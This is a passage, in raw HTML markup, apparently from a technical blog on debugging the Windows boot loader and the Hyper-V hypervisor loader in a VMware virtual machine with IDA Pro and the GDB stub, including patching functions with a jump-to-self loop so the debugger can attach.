baseline;">Next, go to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!HvlpLoadHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. After calling </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CmpFindSkuType</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader!HvlLoadHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is called. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Latest </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> doesn’t contains symbols, but sometimes we need to save explored data to database (IDA PRO works with multiple binaries in one database is not good), therefore we need to switch between databases. Script </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PatchHvLoader2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> shows hvloader_image_base (get from early found name) and patch HvlLoadHypervisor with loop cycle bytes (EB FE – jmp rip)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 41px; overflow: hidden; width: 200px;"><img height="41" src="https://lh6.googleusercontent.com/SQntrhDdpsLAVkDaWCQYlB4C3bK1hoFsVhszHPnFI7ep_AtBGIHM99xh19-at4hm1oBvVozcoXP7hXm5I7QyxuDgtiJcgcouMYi9jRzhkLWLeEjQiQNI4hrWzLN-2T56gyqlWE3-kqlfG-3Dcg" style="margin-left: 0px; margin-top: 0px;" width="200" /></span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Script is needed in manual definition of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader_image_base, p_HvlLoadHypervisor </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> p_HvlLaunchHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> variables. It situated inside </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!HvlpLoadHvLoader</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 129px; overflow: hidden; width: 264px;"><img height="129" src="https://lh5.googleusercontent.com/CIjf-VNMYM8nBUiOwpn1U-i6BHtnHaoJL1I4ym-8Kr_A_w1EinHkORGjL4yv5GyerqxsWCfFAVVYsEckCuBd_a_ec4LpwcyT8UqsgpFwVyYbPKaVPkhe1kUpHeHSxtygBujrv8ThAY0SUQnXcg" style="margin-left: 0px; margin-top: 0px;" width="264" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 264px; overflow: hidden; width: 360px;"><img height="264" src="https://lh4.googleusercontent.com/2Bi5MagB_HBd0QNDZsYsRX-NtXMaf_OWmdMr_Ftw43p27GGxmdsPn6MwNqyWk4VWXAvl5HU1rh6xwIRHVnGlWoPo4KqwxRCmYZgWSM_4FtHHWU7qPZ2n01K_T9EUS1o8EHZ4EjTWqra6EALCEg" style="margin-left: 0px; margin-top: 0px;" width="360" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Remembered </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader_image_base</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> address. Close current winload.efi GDB session (or simply make “detach process”) and load hvloader.dll in IDA. Attach to GDB. CPU is still cycled on jmp rip instruction. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Make </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Edit</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">segments</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rebase</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> program and enter address of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader_image_base</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Launch </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">RestoreHvLoader2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Now you can debug hvloader.dll.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 100px; overflow: hidden; width: 378px;"><img height="100" src="https://lh3.googleusercontent.com/GFL-_9Xha2Ygmdqku1hcg48_R9qhIMWoAffA0aURsPGi16l4iEQRwvP_QW-tGlLPxNvTnjr-W-z9e8n2xhXateOKzodG2cLbyEx_HJkpJQHt8rZnIO8ztD93k_04HOEuDxDv60401LmZa-fqAg" style="margin-left: 0px; margin-top: 0px;" width="378" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Now we have fixed </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> loading addresses (hvloader load address is not randomized in my case). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can switch off VM, enable SecureBoot option in VM settings (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Option</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Advanced</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">UEFI</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Enable secure boot</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and load winload.efi again.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Set monitor.debugOnStartGuest64 = "TRUE" in vmx config file, start VM, attach winload.efi database to VMware GDB stub and you break immediately, after VM running</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 79px; overflow: hidden; width: 225px;"><img height="79" src="https://lh4.googleusercontent.com/O3Otf6mfoToFoFe72kQaZss-Prk0ETZuhoWh2I3RtZZ3MunE605OegOxmniab6rcu0QgtT1KwF4TUwAKX7H_nKDgL-RhtluSRBCqDucwOHiOfZ9VvQIJr7801zHJoyVPLHv464wfukBmSoROAg" style="margin-left: 0px; margin-top: 0px;" width="225" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, press F9 and wait, until you stopped on </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslArchHypervisorSetup</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> again. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Winload.efi!BlSiHandleHypervisorLaunchEvent</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, next </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslArchHypercallSetup</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. End of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!VlpSetupPhase0</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Further bootloader make initialization of disks (including vhd in case of boot-from-vhd option), make UEFI initialization (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!BlHSTICallProviders</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), make initialization code integrity policy (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslInitializeCodeIntegrity</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslFwProtectSecConfigVars</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslpProcessEVStore</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!VlpSetupPhase1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. It calls early found </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader!p_HvlRescindVsm</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Further </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslExecuteTransition</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> calls </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!VlpSetupLaunchPhase</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> again, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslArchHypervisorSetup</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> executes in different way and execute </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll!p_HvlLaunchHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hvloader.dll!HvlLaunchHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> executes </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootlib!BlGetExecutionEnvironment</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootlib!OslLoadMicrocodeUpdate</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and then jumps to hypervisor entry point (in subproc):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 223px; overflow: hidden; width: 176px;"><img height="223" src="https://lh4.googleusercontent.com/54MWQkX-DhQHB-z8rGDbFyA_cZHgINWAttdIIQgQCO2k5lJDhyXk8OTnPevleiJ7MCobzNLJs4PObIUk--GGPRC76D4GoRVrTd35geuMqiupaodaOaWt90lES8ztqXqn9l-K0sr2f8jsZRurfQ" style="margin-left: 0px; margin-top: 0px;" width="176" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 39px; overflow: hidden; width: 179px;"><img height="39" src="https://lh3.googleusercontent.com/J2arRNO1WEW9hrxUrC-Czh4XfEiuVEb3r4OK2yJCT7N5h_IOzII-7k9_N4cminmG-AOcHpC6qz2iNUG0kD6V2hiJBSkOe8iQTzMKWI1QL305p64STiKzdseBYHwV4XRT6C8jIx66LPNqSXYuiw" style="margin-left: 0px; margin-top: 0px;" width="179" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mov cr3, rcx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction we immediately see, that addresses after 0x3000 will be empty (page mapping).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 36px; overflow: hidden; width: 267px;"><img height="36" src="https://lh3.googleusercontent.com/EKitQDvVgJziCJ8XPblb94nI5zWPss6810FvcPDr1fgJYwdJB7hOZtcjpNVxn9gGAQWJV-lBVrvsuYoJN-i9g_e9e0Jp_XOo98osFYdPtC11AoF6jzD1EyoXrTAO-O_ilLg6NkYmM1GjSuGkSw" style="margin-left: 0px; margin-top: 0px;" width="267" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hvix64.exe is already in 64-bit address space. For reading memory from it we need to create debugger segment: Debugger option -> Manual memory regions.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 161px; overflow: hidden; width: 178px;"><img height="161" src="https://lh4.googleusercontent.com/Pm-KrNPvqrRCRHUb4isidzoDHS9glgRlFmBIA7oQpEyP_cdyAZlMDXrL9MDuaF0Er-x4AGXKjP8bXDzoZb9dUw3l_W3YxEf_eZ_OXCf6f9KCJijVtJ9rYhMhTHGX08WS9sYRF5Z40CuPBP78SQ" style="margin-left: 0px; margin-top: 0px;" width="178" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 223px; overflow: hidden; width: 377px;"><img height="223" src="https://lh6.googleusercontent.com/6XGACv5c58ggJcKsPt8IHg-LQwurnqKLXuelb8LZ54BX_L0notPd_Yn2EU3NhE-YpVT4ibWQnLhhDu-q_S_b6MigQ7gV-uqEJ_Zp8c_SVIyWFCpVldZIyhUVDRJFrXD8FwacdNjUWJGBDz_k_w" style="margin-left: 0px; margin-top: 0px;" width="377" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Start address: FFFFFB0000000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">End Address: FFFFFCFFFFFFFFFF</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can set more extended range (f.e. 0-0xFFFFFFFFFFFFFFFE), if debugger doesn’t show warning messages. Launch </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PatchHvix64_2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script, when you on </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">jmp rdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> in </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">jmp rdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction points to address range outside manual memory regions, you get IDA PRO hang.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 